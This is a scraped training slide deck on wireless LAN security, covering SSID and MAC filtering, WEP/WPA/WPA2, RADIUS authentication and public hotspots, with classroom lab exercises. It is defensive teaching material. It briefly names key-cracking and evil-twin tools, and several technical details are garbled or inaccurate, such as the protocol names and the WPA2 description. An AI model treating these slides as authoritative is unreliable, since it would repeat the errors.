350 likes | 565 Vues
Wireless Security Part 2. Contents. Wireless Security issues Explore various security feature available on Access Points Look at Encryption and Authorisation with WEP, WPA, WPA2 (802.11i) Look at 802.1x Authorisation Discuss on Hotspot and it’s security
E N D
Wireless Security Part 2 Part 2
Contents • Wireless Security issues • Explore various security feature available on Access Points • Look at Encryption and Authorisation with WEP, WPA, WPA2 (802.11i) • Look at 802.1x Authorisation • Discuss on Hotspot and it’s security • Share wireless security needs/issues of your schools Part 2
Headlines Teens charged with breaking into School computer (Jan 2009) Jonathan To, 18, and another teen were charged with computer theft after a routine audit discovered a discrepancy between grade reports and school transcripts Kid hacks school comp on teacher's dare (Jan 2001) Fifteen-year-old Washington State high school student Aaron Lutes defeated filtering/security software on a school computer system after his teacher dared the class to try it US school cheat hack suspect faces 38 years jail (June 2008) Tanvir Singh, 18, allegedly conspired with Khan in an abortive attempt to break into school and steal a test. The dynamic duo were caught by a school caretaker in the process of trying to log onto a teacher's computer. Hong Kong student hacks prizes in McDonald's contest (Nov 2008) Hong Kong student has been convicted for hacking into MacDonald's website to claim all the prizes on an online competition Part 2
Wireless Weakness or Hazard Access point weaknesses • Physically insecure installation location • Omni-directional antenna that sends signals in every direction • Signal power level too high allowing radio signals to leak outside of your building • MAC address controls that are easily circumvented • WEP, WPA, or WPA2 not being used or not being used properly • Management interfaces that are publicly-accessible -- often with weak or no administrator password protection Wireless client weaknesses • Windows systems not protected by a personal firewall that are sharing drives, providing various types of remote connectivity and missing critical software patches • Dual-homed systems that are connected to both the wired and wireless networks at the same time • Wireless clients with ad-hoc mode enabled • Printers installed on the wired network with wireless connectivity left enabled Part 2
Security needs • Ensure no unauthorised access • Protect the network from illegal client connect to your network using your resources • “Man in the middle” placed in your network to capture your network related • Several techniques • SSID, MAC Address, Authorisation with Passphrase, Digital certificate, RADIUS server Part 2
SSID – Service Set Identifier • Name given to identify a wireless network • All devices this same name to communicate • Can be up to 32 characters • Broadcast at predetermined time and client seeks for SSID when joining the network Disable SSID broadcasting – “Invisible network” Part 2
Workshop – SSID security • AP - set up an SSID (ITEDxx where xx = 01 - 08) and inform your team member the full SSID name • Client – Use Windows “Windows Zero Configuration” connect to the available wireless network via “available wireless network” • Repeat the above but hide (disable broadcasting) the SSID • Can clients connect and is your network protected? Part 2
MAC Address filter • A MAC (Media Access Control) address (physical address) is 12 Hex characters. Example 02-00-54-55-4E-01 • Can use MAC address filter to control which clients can access the wireless network • Administrator enters the list of MAC addresses into AP Part 2
Workshop – Mac Address filtering • Group members determine the MAC address of your wireless network card • AP- Administrator enter the list of MAC into the AP and set the AP with “Open” security • Client - Use Windows “Wireless Zero Configuration” connect to your wireless network • AP- disable MAC address filtering • Client – repeat step 3 • Were you able to connect successfully? Part 2
Two security features • Encryption • Prevent the content from read by unauthorised people • The network traffic is encrypted to a format that is understood by other party only • Authorisation • 2 usage • Authenticate the accessing device or person is the correct person • Used to verify that the information comes from a trusted source Part 2
Encryption Standards Wireless technology transmit information through space hence, security features have been design into the relevant protocols. Security consideration: Message Protection Access Authentication/Authorisation • WEP – Wireless Equivalent Privacy • WPA – WIFI Protected Access • WPA2 equivalent to IEEE 802.11i Part 2
Wireless LAN authorisation • 2 basic information • SSID (aka Network Name or Network ID) • “Password” or Share key or “Passphrase” • WEP • WPA • 802.11i (WPA2) • Digital Certificate • Radius at backend • CA Part 2
Infrastructure mode SSID of the Access Point Network Access Protection To ensure only authorized clients, valid Security Set ID(SSID) must match • An Access Point is required • Select INFRSTRUCTURE setting Part 2
WEP Encryption Key • Wired Equivalent Privacy security • WEP encryption is available on all 802.11a/b/n protocols • Standard required only 40-bit (64 bits key) but almost all vendors provide 104-bit (128 bits key) and some even provide 256-bit WEP key. • WEP uses the RC4 algorithm to encrypt the packet of information as they are sent out Part 2
Example: 64 bit key Pre-shared Password, supplied by the user (40 bits) = A7z9b = 41377A3962 7 4 3 6 3 A 9 7 2 1 Encryption Explained Each key (“Packet Key”) consist of two parts Pre-shared Password – supplied by user Initialised Vector (IV) – random generated Initalised Vector, random generated by the system (24 bits) = 810 = 383130 Packet Key = Pre-shared Key + IV = A7z9b810 = 41377A3962383130 Part 2
Workshop – WEP security • AP – Administrator formulate a 5 character pre-shared key and enter pre-shared key in Key 1. Set security = “Static WEP”, share key. • Inform all team member of the SSID and pre-share key • Client – Connect with the given SSID and WEP pre-shared key Part 2
What is WPA? There is a MAJOR weaknesses in WEP • The Wi-fi Alliance look into alternative with IEEE • An interim security standard for replacing WEP • A sub set technology that is taken from the IEEE 802.11i • It is designed to secure all versions of 802.11, including a/b/g/n • New Temporal Key Integrity Protocol (TKIP) encryption is used • Employ 802.1X authentication with one of the standard EAP (Extensible Authentication Protocol) – digital cert, user name and password, smart card. The encryption code be hacked very easily Part 2
TKPI (Temporal Key Integrity Protocol) • Improvement to WEP • Longer key for encryption – 128bits • Key mixing function for EVERY packet • Each packet transmitted is assigned a 48bits serial number which increases with each new packet – to avoid fake AP’s create “replay attack” • A new base key for each wireless client associated with AP Part 2
WEP vs WPA Part 2
Password Password Password ***** ***** ***** Internet How Does it Work? (in SOHO) Step 1 Enter matching passwords into AP and Client Step 2 AP checks client’s password. If match client joins network. If not a match client kept off network Access Point/Router Step 3 Keys derived & installed. Client and AP exchange encrypted data Part 2
Workshop – WPA setup with Passphrase security • AP – Formulate a passphrase (pre-shared key) 8 - 63 characters • Inform all members of the passphrase and SSID • Client - Connect with the given SSID and WPA pre-shared key • Were you able to connect successfully? Part 2
IEEE 802.111 (WPA2) • 802.11i is the official IEEE attempt to supply strong security for wireless links • 802.11i will use Temporal Key Integrity Protocol (TKIP) similar to WPA. • Additionally added AES (Advance Encryption Standard) offering 128 bits, 192 bits and 256 bits block encryption. • Authentication using 802.1x for port access authentication (EAP-TLS, PEAP, LEAP) • RADIUS for Authentication, Authorisation and Accounting with default port 1812 for authorisation and port 1813 for accounting Part 2
Authentication Comparison EAP –MD5 (Message-Digest Algorithm 5) : One way Authentication, Uses WEP encryption EAP – TLS (Transport Layer Security): Digital cert used for client and Server authentication, Exchange is done in open EAP – TTLS (Tunneled Transport Layer Service) : Digital Cert is used only at server side authentication. Client’s user id and password is sent in secure connection PEAP (Protected EAP) : Ditial cert is used at server side. But support only EAP-MD5, EAP-MSCHAPv2 LEAP – Lightweight Extensible Authentication Protocol): Cisco’s version of 802.1x Part 2
Password Password Password ***** ***** ***** Internet How Does it Work? (in Enterprise) Step 1 Enter matching passwords into AP and Client Step 2 AP passes the authentication ID to the RADIUS server instead of performing authentication by itself. Wired Network Access Point/Router ID OK ! Step 3 Server checks the credential against it’s records. Grants or denies access accordingly. Group key is issued to ALL stations so that they can encrypt data for sending and receiving. ID ? RADIUS = Remote Authentication Dial In User Service Part 2
Password Password Password ***** ***** ***** Internet Radius Workshop Network Plan Step 1 Station is challenged to enter user ID and Password Step 2 AP passes the authentication ID to the RADIUS server (10.10.13.168) Wired Network Access Point/Router ID OK ! ID ? 10.10.13.168 Windows 2003 Server A member of a Domain running Directory service Part 2
Workshop – Radius Authentication • AP – set to use RADIUS server IP = 10.10.13.168 for authentication • Set WEP as encryption protocol • RADIUS – set passphrase for the AP to logon • Client – Configure a wireless connection to use the trainer’s AP . • When connecting to the AP it will challenge user to enter user ID and Password ( user id and password = userxx where xx = 01-30) Part 2
Security Summary Weakest Strongest Part 2
Other Wireless Securities • VPN (Virtual Private Network) • Creating a virtual connection using IPsec or other VPN protocols to ensure the transmitted data is encrypted • Need VPN server • VLAN (Virtual LAN) with multiple SSID • Separate the users access to separate resources on the network • Need VLAN supporting switch and AP Part 2
SECURITY EXPERIENCE SHARING What wireless network is implemented & What security issues you can foreseen Part 2
Wireless Testing Tools Free Tools • NetStumbler quickly identifies basic wireless devices that will respond to an "anybody out there?" request. • Kismet roots out wireless devices that have their SSIDs hidden or otherwise won't respond to basic NetStumbler probes. If you're not into Linux or don't want to spend hours if not days setting up your wireless card drives in Linux, you can run Kismet directly from the BackTrack Live CD. • Aircrack is for WEP and WPA pre-shared key cracking. • FakeAP on the BackTrack Live CD mimics a legitimate access point and sets up an evil twin attack to see how your users carelessly connect to any old access point. • Wireshark Packet capturing tool Commercial Tools • AiroPeek wireless network analyzer to quickly and easily capture packets, look for top talkers, discover rogue systems, and more • AirMagnet Laptop Analyzer, among many other things, has a nifty signal strength meter for determining how close or far away a wireless device is when you're walking around trying to locate it. • CommView WiFi is for low-cost packet capturing, packet generation and more. • Wfilter an Internet monitoring tool, web, IM, Part 2
Public WiFi and Hotspot • Hong Kong “A Wireless City” • HK Government has a vision • Current players • HK Government with about 3000 APs • Commercial operators with 5000 APs • FON, ?? • Free WiFi shopping malls/resturants/café, etc. • Explore security control with public wifi operators Part 2
Search For register WiFi AP • Registered public AP are registered with OFTA • You can find out where there are avaiable WiFi AP at: https://apps.ofta.gov.hk/apps/clr/content/public_search.asp • Recommendation when using public WiFi http://www.infosec.gov.hk/english/yourself/wireless_3.html Part 2
PCCW and Airport https://hotspot.netvigator.com/airport/login2.html A commercial web base application that authenticates user Once logged in it will allow user to connect to the WiFi network Found in Hotel’s, Airport and shopping malls, etc. Captive Portal Part 2
Course Summary • Looked at Wireless LAN standards - IEEE 802.11 a/b/g/n • We have learn how to setup • Ah-hoc • Enterprise • Looked at various type of standard wireless security • SSID, MAC address filtering • Encryption – WEP, WPA, WPA2 • Authorisation - 802.1x, RADIUS • Evaluated the advantages and disadvantages Part 2